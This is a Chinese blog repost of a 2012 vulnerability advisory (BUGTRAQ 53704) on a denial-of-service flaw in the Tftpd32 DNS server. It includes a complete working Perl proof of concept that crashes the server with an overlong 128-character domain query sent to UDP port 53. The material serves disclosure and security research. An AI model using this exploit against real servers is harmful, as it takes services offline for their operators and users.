tftpd32Linux,Tftpd32 DNS服务器拒绝服务漏洞

最新推荐文章于 2023-03-16 22:39:49 发布
最新推荐文章于 2023-03-16 22:39:49 发布
阅读量373 收藏
点赞数
文章标签: tftpd32Linux

发布日期:2012-05-28

更新日期:2012-05-29

受影响系统:

TFTPD32 TFTPD32 4.00

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 53704

Tftpd32是Windows平台上的TFTP和DHCP服务器。

TFTPD32 4.00之前版本在实现上存在拒绝服务漏洞,DNS服务器绑定了UDP端口53,但没有验证域选项大小,在发送超过127个字符时,攻击者可利用此漏洞造成服务器崩溃。

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

demonalex ()提供了如下测试方法:

Proof Of Concept :

-----------------------------------------------------------

#!/usr/bin/perl

use IO::Socket;

use Socket;

use Math::BigInt;

$|=1;

$host=shift;

$port=shift || '53';

die "usage: $0 \$host [\$port]\n" if(!defined($host));

$target_ip = inet_aton($host);

$target = sockaddr_in($port, $target_ip);

$crash='A'x128;

$transaction_id_count=1;

sub dns_struct_pack($){

$domain=shift;                  #domain

$type="\x00\xff";               #dns_type = ANY

$transaction_id_count=1 if($transaction_id_count > 255);

$x=Math::BigInt->new($transaction_id_count);

$x=~s/0x//;

$transaction_id=sprintf("\x00".chr($x));

$flag="\x01\x00";

$question="\x00\x01";

$answer_rrs="\x00\x00";

$authority_rrs="\x00\x00";

$additional_rrs="\x00\x00";

if($domain ne '0'){

undef($domain_length);

$domain_length=length($domain);

$y=Math::BigInt->new($domain_length);

$y=~s/0x//;

$domain_length=chr($y);

}

$class="\x00\x01";                    #IN

$transaction_id_count++;

if($domain eq '0'){

$packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."\x00"."$type"."$class";

}else{

$packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."$domain_length"."$domain".

"\x00"."$type"."$class";

}

return $packet_struct;

}

print "Launch attack ... ";

socket(SOCK1, AF_INET, SOCK_DGRAM, 17);

send(SOCK1, &dns_struct_pack($crash), 0, $target);

close(SOCK1);

print "Finish!\n";

exit(0);

-----------------------------------------------------------

建议:

--------------------------------------------------------------------------------

厂商补丁:

TFTPD32

-------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

宸艺
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
tftpd32(支持linux上传文件)
05-08
tftpd32(支持linux上传文件),官网有,方便自己使用.
tftpd32linux命令,玩转Windows/Linux tftp命令
weixin_35578185的博客
05-15 493
tftp很好理解, 主要用来传文件, 下面以我的操作来谈谈tftp中最重要的几个命令。一. Windows上的sftp命令(据说Linux上也是这样, 当然此处是指非嵌入式的Linux) 步骤:a. 在Windows上开启sftp服务器tftpd32.exe, 然后选定一个默认的目录作为服务器根目录,此时, tftpd32.exe自动读取pc的ip, 该ip就是tftp服务器的ip, 比如192....
tftp目录linux目录,Ipswitch TFTP Server目录遍历漏洞
weixin_39684960的博客
04-28 298
发布日期:2011-12-02更新日期:2011-12-05受影响系统:Ipswitch Ipswitch TFTP Server 1.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 50890Ipswitch TFTP Server是免费的网络系统或...
window和linux传文件之tftpd32工具
爱,忠于内心的世界。
12-12 1019
一般情况,创建新建文件夹,放入tftp32软件 1. window打开tftp32软件,设置serverip和目标文件夹,通过setting勾选option negotiation、show progress bar、translate unix file names三项。 2. telnet进入linux终端,输入指令:tftp -r rduser -g 192.168.2.12,成功传送文
windows和linux系统下数据传输工具——tftpd32使用说明
weixin_34357962的博客
12-06 801
说明:tftpd32工具是安装在windows系统下的,其windows系统下使用图解如下: 1.下载tftpd32,在搜索页面输入“tftpd32 传输工具”可看到我上传的tftpd32软件; 2.打开和设置如下图所示: 设置 在上图中,我windows下的ip地址是192.168.0.34,一般情况下打开tftpd32工具后,会自动找到你的电脑ip地址; 3.windows系...
tftpd32 可以搭建tftp的服务器或者作为客户端使用
12-24
tftpd32 可以搭建tftp的服务器或者作为客户端使用
tftpd32-tftp服务器应用程序
04-26
tftp服务器,终端数据上传和下载
tftpd32服务器程序
09-28
tftpd32服务器,嵌入式开发必备工具
tftpd32.452 (2)_tftpd32_
10-03
tftpd32 runing source file
时间服务器tftpd32
07-29
时间服务器tftpd32时间服务器tftpd32时间服务器tftpd32时间服务器tftpd32时间服务器tftpd32
tftpd32软件
10-15
Tftpd32软件适用于32位系统和部分64位系统,用于Linux开发的远成访问。
TFTPD32服务器汉化版v3.51--经典绿色工具
01-23
TFTPD32 V3.51 支持TFTP服务器、TFTP客户端、DHCP服务器、SYSlog服务器、DNS服务器、,--经典绿色mini工具
TFTPD32不能传输数据的解决与尝试
qq_43086265的博客
05-15 8507
TFTPD32不能传输数据的解决与尝试 背景:某日做GNS3拓扑实验需要将GNS3的配置文件传入本地,于是下载了TFTPD32,简要拓扑图如下,设置好后能PING通,但是无法传输,简直百思不得其解,于是做了各种尝试,历时3小时……真笨(手动滑稽) 错误方法一:添加系统TFTP 在能PING通的情况下,不可避免的认为是TFTP的问题,开始认为是系统问题,,我用的是GHOST端口,认为没开69端...
tftpd32
公众呺:Linux兵工厂, 加关+私信获取海量Linux干货资料和代码
05-14 1827
tftp的用法 一、上传: 格式:tftp -i 你的IP get 要上传文件 存放位置(可以省略) 比如tftp -i 202.116.191.200 get findpass.exe 二、下载: 格式:tftp -i 你的IP put 要下载文件 存放位置(可以省略) 比如tftp -i 202.116.191.200 put good.rar 注意点: 1、tftp在运行中
ubuntu16.04建立tftp服务器(同时解决无法连网等问题)
YYaomiao的博客
03-16 760
建立tftp服务器、ubuntu16.04有线链接
关于DNS拒绝服务漏洞(CVE-2020-8617)的研究
u011275740的博客
06-02 2127
参考PoC资料:自建docker DNS服务器,并验证可以触发Assertion,导致服务器停止运行,仅限教学用: https://github.com/knqyf263/CVE-2020-8617 参考价值较高的漏洞分析原文资料: https://kb.isc.org/docs/cve-2020-8617 影响:CVE-2020-8617是由检查TSIG合理性的验证代码中的逻辑错误引发的,攻击者可以通过精心构造的payload触发tsig.c文件的失败断言,导致拒绝服务攻击。 披露时间:2.
tftp配置方法及常见错误
热门推荐
一直走的专栏
03-08 1万+
之前也配置过tftp,但是没有做记录,导致今天再次配置的时候又出问题了,所以在这里记录一下 大部分内容都是参考别人的,这里只是综合了一下 一、tftp配置方法 1:sudo apt-get install tftp tftpd openbsd-inetd 特别指出很多文章里用的是netkit-inetd,但是实际下载时发现 这个软件是下不到的,特改用openbsd-inetd,实验效果不
从TCP协议的原理来谈谈rst复位攻击
iteye_10227的博客
02-06 4647
在谈RST攻击前,必须先了解TCP:如何通过三次握手建立TCP连接、四次握手怎样把全双工的连接关闭掉、滑动窗口是怎么传输数据的、TCP的flag标志位里RST在哪些情况下出现。下面我会画一些尽量简化的图来表达清楚上述几点,之后再了解下RST攻击是怎么回事。   1、TCP是什么? TCP是在IP网络层之上的传输层协议,用于提供port到port面向连接的可靠的字节流传输。我来用土语解释下上面...
TFTPD32无法传输
ee230的专栏
08-28 7313
安装了几个软件之后,发现TFTPD32.exe
tftpd32.zip
最新发布
11-19
TFTPD32是一个免费的TFTP(Trivial File Transfer Protocol,简易文件传输协议)服务器和客户端工具。它通常以压缩包的形式发布,文件名为tftpd32.zip。 TFTPD32是一个非常简单易用的工具,它可以在本地计算机上运行TFTP服务器,允许用户通过TFTP协议在本地网络中传输文件。用户可以使用TFTPD32来向其他计算机发送文件或从其他计算机接收文件,而不需要额外的配置或复杂的操作。 这个工具的压缩包中包含了运行TFTPD32所需的全部文件,包括执行文件和配置文件等。用户只需要解压缩该文件,并运行其中的可执行文件,即可启动TFTPD32服务器。用户还可以根据自己的需要,通过编辑配置文件来进行更进一步的设置和自定义。 TFTPD32还提供了一些额外的功能和选项,例如DHCP服务器和SNTP服务器等。这些附加功能使得TFTPD32成为一个更全面和强大的工具,可以满足不同用户的需求。 总的来说,tftpd32.zip是TFTPD32这个实用工具的压缩包,它提供了一种简单和方便的方式来运行TFTP服务器和客户端,可以在本地网络中轻松地传输文件。无论是在教育、开发还是网络管理等领域,TFTPD32都是一个非常实用的工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值